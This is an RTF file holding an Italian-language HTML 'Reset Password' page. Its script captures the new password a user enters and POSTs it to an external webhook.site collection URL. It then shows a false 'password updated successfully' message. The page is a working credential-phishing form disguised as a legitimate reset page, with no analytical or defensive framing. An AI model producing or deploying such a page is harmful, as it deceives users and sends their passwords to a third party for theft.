{\rtf1\ansi\ansicpg1252\cocoartf2822
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 <!DOCTYPE html>\
<html lang="it">\
<head>\
<meta charset="UTF-8" />\
<meta name="viewport" content="width=device-width, initial-scale=1" />\
<title>Reset Password</title>\
<style>\
  body \{\
    font-family: Arial, sans-serif;\
    background: #f2f2f2;\
    display: flex;\
    justify-content: center;\
    align-items: center;\
    height: 100vh;\
  \}\
  .container \{\
    background: white;\
    padding: 30px;\
    border-radius: 8px;\
    box-shadow: 0 0 15px rgba(0,0,0,0.2);\
    max-width: 400px;\
    width: 100%;\
  \}\
  h2 \{\
    margin-bottom: 20px;\
    color: #333;\
  \}\
  input[type="password"] \{\
    width: 100%;\
    padding: 12px;\
    margin-bottom: 20px;\
    border: 1px solid #ccc;\
    border-radius: 4px;\
    font-size: 16px;\
  \}\
  button \{\
    background: #4CAF50;\
    color: white;\
    padding: 12px;\
    border: none;\
    width: 100%;\
    font-size: 16px;\
    cursor: pointer;\
    border-radius: 4px;\
  \}\
  button:hover \{\
    background: #45a049;\
  \}\
  .message \{\
    margin-top: 20px;\
    color: #555;\
  \}\
</style>\
</head>\
<body>\
  <div class="container">\
    <h2>Reset Password</h2>\
    <form id="resetForm">\
      <input type="password" id="newPassword" placeholder="Inserisci nuova password" required />\
      <button type="submit">Conferma</button>\
    </form>\
    <div class="message" id="message"></div>\
  </div>\
\
<script>\
  const form = document.getElementById('resetForm');\
  const messageDiv = document.getElementById('message');\
\
  form.addEventListener('submit', e => \{\
    e.preventDefault();\
    const pwd = document.getElementById('newPassword').value;\
\
    fetch('{\field{\*\fldinst{HYPERLINK "https://webhook.site/7f9a0206-fcaf-42ed-9f6e-91d26f045b8b"}}{\fldrslt https://webhook.site/7f9a0206-fcaf-42ed-9f6e-91d26f045b8b}}', \{\
      method: 'POST',\
      headers: \{'Content-Type': 'application/json'\},\
      body: JSON.stringify(\{password: pwd\})\
    \}).then(() => \{\
      messageDiv.textContent = 'Password aggiornata con successo!';\
      form.reset();\
    \}).catch(() => \{\
      messageDiv.textContent = 'Errore, riprova.';\
    \});\
  \});\
</script>\
</body>\
</html>}